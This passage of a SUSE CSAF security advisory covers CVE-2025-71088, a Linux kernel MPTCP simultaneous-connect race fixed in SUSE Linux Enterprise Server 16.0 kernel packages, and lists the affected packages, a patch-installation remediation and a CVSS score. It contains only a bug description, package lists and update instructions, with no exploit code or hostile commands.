net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
